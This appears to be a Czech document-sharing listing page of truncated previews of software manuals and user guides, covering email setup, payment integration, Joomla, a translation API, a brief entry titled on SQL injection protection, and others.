Ing. Přemysl Brada, MSc., Ph.D. Ing. Martin Dostal. Katedra informatiky a výpočetní techniky, FAV, ZČU v Plzni

Ing. Přemysl Brada, MSc., Ph.D. Ing. Martin Dostal. Katedra informatiky a výpočetní techniky, FAV, ZČU v Plzni Webové aplikace Ing. Přemysl Brada, MSc., Ph.D. Ing. Martin Dostal Katedra informatiky a výpočetní techniky, FAV, ZČU v Plzni Harmonogram Dopolední blok 9:00 12:30 Ing. Dostal Úvod, XHTML + CSS Ing. Brada,

Více

TACHOTel manuál 2015 AURIS CZ

TACHOTel manuál 2015 AURIS CZ TACHOTel manuál 2 TACHOTel Obsah Foreword I Úvod 0 3 1 Popis systému... 3 2 Systémové... požadavky 4 3 Přihlášení... do aplikace 5 II Nastavení aplikace 6 1 Instalace... a konfigurace služby ATR 6 2 Vytvoření...

Více

Aplikace BSMS. Uživatelská příručka - 1 -

Aplikace BSMS. Uživatelská příručka - 1 - Aplikace BSMS Uživatelská příručka - 1 - Obsah 1. O aplikaci BSMS... 3 2. Základní předpoklady pro používání BSMS... 3 3. Instalace aplikace... 3 3.1. Samotná instalace... 3 3.2. Možné problémy při instalaci...

Více

Questionnaire příručka uživatele

Questionnaire příručka uživatele Questionnaire příručka uživatele Obsah: K čemu aplikace slouží? Popis funkcí Návod k použití o Úvodní dialogové okno o Pro respondenty o Pro administrátory K čemu aplikace slouží? Program questionnaire

Více

Databáze prodejců. Tlačítka. Vytvoří kartu nového prodejce (Alt+N); Změní vybraného prodejce Uloží nového prodejce nebo změnu (Alt+U);

Databáze prodejců. Tlačítka. Vytvoří kartu nového prodejce (Alt+N); Změní vybraného prodejce Uloží nového prodejce nebo změnu (Alt+U); Databáze prodejců Tlačítka Vytvoří kartu nového prodejce (Alt+N); Změní vybraného prodejce (Alt+E); Uloží nového prodejce nebo změnu (Alt+U); Při zakládání nového prodejce zadejte jeho číslo (musí to být

Více

Na vod k nastavenı e-mailu

Na vod k nastavenı e-mailu Na vod k nastavenı e-mailu 1. Návod k nastavení e-mailových schránek na serveru stribrny.net. Do e-mailových schránek lze přistupovat přes webové rozhraní Webmail nebo přes poštovního klienta. Návod popisuje

Více

Manuál pro implementaci služby PLATBA 24. Datum: 17. prosince 2014 Verze: 1.49

Manuál pro implementaci služby PLATBA 24. Datum: 17. prosince 2014 Verze: 1.49 Manuál pro implementaci služby PLATBA 24 Datum: 17. prosince 2014 Verze: 1.49 1 Úvodní informace ke službě PLATBA 24... 3 1.1 Obecný popis služby... 3 1.2 Administrativní předpoklady k využití služby PLATBA

Více

[1] ICAReNewZEP v1.2 Uživatelská příručka

[1] ICAReNewZEP v1.2 Uživatelská příručka [1] ICAReNewZEP v1.2 Uživatelská příručka 06.10.2011 [2] Obsah 1 - ÚVOD... 3 2 - POUŽITÉ ZKRATKY... 3 3 POŽADAVKY... 4 3.1 POŽADAVKY PRO SPRÁVNÝ CHOD APLIKACE... 4 3.2 POŽADAVKY NA OBNOVOVANÝ CERTIFIKÁT...

Více

ANOTACE vytvořených/inovovaných materiálů

ANOTACE vytvořených/inovovaných materiálů ANOTACE vytvořených/inovovaných materiálů Číslo projektu Číslo a název šablony klíčové aktivity Tematická oblast Formát Druh učebního materiálu Druh interaktivity CZ.1.07/1.5.00/34.0722 III/2 Inovace a

Více

Modul ekomunikace. Uživatelský návod. Návod Dokumentace. Verze 1.1 poslední změna 09.02.2015. Modul ekomunikace strana 1/5

Modul ekomunikace. Uživatelský návod. Návod Dokumentace. Verze 1.1 poslední změna 09.02.2015. Modul ekomunikace strana 1/5 Modul ekomunikace Uživatelský návod Návod Dokumentace Verze 1.1 poslední změna 09.02.2015 Modul ekomunikace strana 1/5 ekomunikace Modul ekomunikace umožňuje využívat B2B synchronní služby VZP, které zahrnují

Více

Artlingua Translation API

Artlingua Translation API Artlingua Translation API Dokumentace Jan Šváb, Artlingua, a.s. 2015 Revize: 2015-09-22 - verze API : v1 Obsah Obsah... 2 Předávání dokumentů k překladu... 3 Implementace klientské aplikace pro Translation

Více

OBSAH. 48 Příručka ON-LINE KUPEG úvěrová pojišťovna, a.s. www.kupeg.cz

OBSAH. 48 Příručka ON-LINE KUPEG úvěrová pojišťovna, a.s. www.kupeg.cz DODATEK č. 1 20.1.2012 OBSAH OBSAH... 48 C. PRÁCE SE SYSTÉMEM... 49 C.1 ÚVODNÍ OBRAZOVKA PO PŘIHLÁŠENÍ... 49 C.2 NASTAVENÍ VLASTNÍCH ÚDAJŮ... 50 a. Nastavení Uživatele... 50 b. Nastavení Systému... 51

Více

Nápověda pro aplikaci Manuscriptorium Kandidátů (M-Can) http:://candidates.manuscriptorium.com

Nápověda pro aplikaci Manuscriptorium Kandidátů (M-Can) http:://candidates.manuscriptorium.com Nápověda pro aplikaci Manuscriptorium Kandidátů (M-Can) http:://candidates.manuscriptorium.com Hlavní funkce aplikace Uživatelům autorům Otázky a odpovědi Jaké dokumenty lze do Manuscriptoria nabízet pomocí

Více

Popis ovládání. Po přihlášení do aplikace se objeví navigátor. Navigátor je stromově seřazen a slouží pro přístup ke všem oknům celé aplikace.

Popis ovládání. Po přihlášení do aplikace se objeví navigátor. Navigátor je stromově seřazen a slouží pro přístup ke všem oknům celé aplikace. Popis ovládání 1. Úvod Tento popis má za úkol seznámit uživatele se základními principy ovládání aplikace. Ovládání je možné pomocí myši, ale všechny činnosti jsou dosažitelné také pomocí klávesnice. 2.

Více

Zpracoval Datum Verze Popis změn

Zpracoval Datum Verze Popis změn Uživatelský manuál Zpracoval Datum Verze Popis změn Grant Avakjan 29.09.2010 1.0 Vytvoření manuálu Grant Avakjan 14.10.2010 2.0 Aktualizace dokumentu Aleš Danda 2. 8. 2011 2.1 Aktualizace dokumentu popis

Více

Průvodce instalací modulu Offline VetShop verze 3.4

Průvodce instalací modulu Offline VetShop verze 3.4 Průvodce instalací modulu Offline VetShop verze 3.4 Úvod k instalaci Tato instalační příručka je určena uživatelům objednávkového modulu Offline VetShop verze 3.4. Obsah 1. Instalace modulu Offline VetShop...

Více

Jan Forman Manuál 30.5.2013. CLASSIFICATIO N: public / veřejný dokument IDE NTIFICATIO N N U MBER: 0000000000001 AUTH OR:

Jan Forman Manuál 30.5.2013. CLASSIFICATIO N: public / veřejný dokument IDE NTIFICATIO N N U MBER: 0000000000001 AUTH OR: CLASSIFICATIO N: public / veřejný dokument TITLE: Manuál k webovému rozhraní hostingu P ub l i c URL: http://janforman.org/files/webhosting.pdf OFFICE NAME AND ADDRESS: --- IDE NTIFICATIO N N U MBER: 0000000000001

Více

MƏj úĭet Uživatelský manuál Verze 1.01/2010

MƏj úĭet Uživatelský manuál Verze 1.01/2010 M j ú et Uživatelský manuál Verze 1.01/2010 Obsah 1 Přihlášení do aplikace Klientské centrum.......................................................................................... 4 2 Zprávy systému...................................................................................................................

Více

Lokality a uživatelé

Lokality a uživatelé Administrátorský manuál TTC TELEKOMUNIKACE, s.r.o. Třebohostická 987/5 100 00 Praha 10 tel.: 234 052 111 fax.: 234 052 999 e-mail: ttc@ttc.cz http://www.ttc-telekomunikace.cz Datum vydání: 15.října 2013

Více

Návod pro použití bezpečnostního tokenu SafeNet etoken PASS s Portálem datových stránek. Poslední verze ze dne 6. 6. 2011

Návod pro použití bezpečnostního tokenu SafeNet etoken PASS s Portálem datových stránek. Poslední verze ze dne 6. 6. 2011 Návod pro použití bezpečnostního tokenu SafeNet etoken PASS s Portálem datových stránek Poslední verze ze dne 6. 6. 2011 OBSAH: Aktivace tokenu etokenpass...4 Přihlášení k Portálu datových stránek...7

Více

1. Pro přihlášení k odběru novinek klikněte na tlačítko Registrace nového uživatele.

1. Pro přihlášení k odběru novinek klikněte na tlačítko Registrace nového uživatele. 1. Vstup do aplikace Na adrese: http://prace.statnisprava.cz 2. První stránka aplikace 1. Pro přihlášení k odběru novinek klikněte na tlačítko Registrace nového uživatele. 2. Poté budete přesměrováni na

Více

Příručka uživatele HELPDESK GEOVAP

Příručka uživatele HELPDESK GEOVAP HELPDESK GEOVAP verze 1.2 11.11.2008 OBSAH 1 REGISTRACE DO HELPDESK...1 2 PŘIHLÁŠENÍ A ODHLÁŠENÍ...1 3 ZÁKLADNÍ OBRAZOVKA HELPDESK...2 4 PŘEHLED HLÁŠENÍ...2 5 ZALOŽENÍ NOVÉHO HLÁŠENÍ...3 6 ZOBRAZENÍ/EDITACE

Více

Evidence požadavků uživatelů bytů a nebytových prostor

Evidence požadavků uživatelů bytů a nebytových prostor Evidence požadavků uživatelů bytů a nebytových prostor Úvod Pro zjednodušení a zprůhlednění Vaší komunikace se správní firmou (dále jen SF ), která má na starost objekt, v němž se nachází bytový či nebytový

Více

Modul Download pro redakční systém Marwel

Modul Download pro redakční systém Marwel Modul Download pro redakční systém Marwel postupy a doporučení pro práci redaktorů verze manuálu: 0.1 Únor 2008 Podpora: e-mail: podpora@qcm.cz tel.: +420 538 702 705 Obsah Správce stahování...3 Přihlášení...3

Více

Příručka nastavení funkcí snímání

Příručka nastavení funkcí snímání Příručka nastavení funkcí snímání WorkCentre M123/M128 WorkCentre Pro 123/128 701P42171_CS 2004. Všechna práva vyhrazena. Uplatňovaná ochrana autorských práv se vztahuje na všechny formy a záležitosti

Více

1. Úvod do Ajaxu 11. Jak Ajax funguje? 13

1. Úvod do Ajaxu 11. Jak Ajax funguje? 13 Obsah Úvodem 9 1. Úvod do Ajaxu 11 Jak Ajax funguje? 13 Popis 13 Ukázky 13 Jaké jsou možnosti tvorby interaktivních webových aplikací? 15 Co je třeba znát? 16 Jak fungují technologie Ajaxu 16 Jak funguje

Více

E-BILLING UŽIVATELSKÝ MANUÁL. Platí od 08.2012. www.dhlfreight.cz 840 111 308

E-BILLING UŽIVATELSKÝ MANUÁL. Platí od 08.2012. www.dhlfreight.cz 840 111 308 E-BILLING UŽIVATELSKÝ MANUÁL Platí od 08.2012 www.dhlfreight.cz 840 111 308 Obsah 1. E-BILLING 1.1 Úvod... 3 2. Registrační proces 2.1 Registrace do DHL E-BILLING... 4 2.2 Postup registrace do DHL E-BILLING...

Více

Redakční systém Joomla. Prokop Zelený

Redakční systém Joomla. Prokop Zelený Redakční systém Joomla Prokop Zelený 1 Co jsou to red. systémy? Redakční systémy (anglicky Content Management System - CMS) jsou webové aplikace používané pro snadnou správu obsahu stránek. Hlavním cílem

Více

Nastavení telefonu Samsung S5610

Nastavení telefonu Samsung S5610 Nastavení telefonu Samsung S5610 Telefon Samsung S5610, zakoupený v prodejní síti společnosti T-Mobile Czech Republic a.s., má potřebné parametry pro použití T-Mobile služeb již přednastaveny. Pokud je

Více

db-direct internet Customer Self Administration (vlastní správa uživatelů) Uživatelská příručka

db-direct internet Customer Self Administration (vlastní správa uživatelů) Uživatelská příručka db-direct internet Customer Self Administration (vlastní správa uživatelů) Uživatelská příručka Deutsche Bank, pobočka Praha Verze 8.2 červenec 2009 Obsah Obsah... 1 Úvod... 2 Detailní popis... 3 Zavedení

Více

Zabezpečení proti SQL injection

Zabezpečení proti SQL injection Zabezpečení proti SQL injection ESO9 intranet a.s. Zpracoval: Tomáš Urych U Mlýna 2305/22, 141 Praha 4 Záběhlice Dne: 19.9.2012 tel.: +420 585 203 370-2 e-mail: info@eso9.cz Revize: Urych Tomáš www.eso9.cz

Více

CitiManager: Stručný návod k přechodu na nový systém pro držitele karet

CitiManager: Stručný návod k přechodu na nový systém pro držitele karet Tento stručný návod vám ukáže: 1. jak postupovat při registraci do CitiManager a) Pouze pro stávající držitele karet, kteří používají online výpisy b) Pouze pro držitele karet, kteří používají papírové

Více

1. Pro přihlášení k odběru novinek klikněte na tlačítko Registrace nového uživatele.

1. Pro přihlášení k odběru novinek klikněte na tlačítko Registrace nového uživatele. 1. Vstup do aplikace Na adrese: http://i.statnisprava.cz 2. První stránka aplikace 1. Pro přihlášení k odběru novinek klikněte na tlačítko Registrace nového uživatele. 2. Poté budete přesměrováni na stránku

Více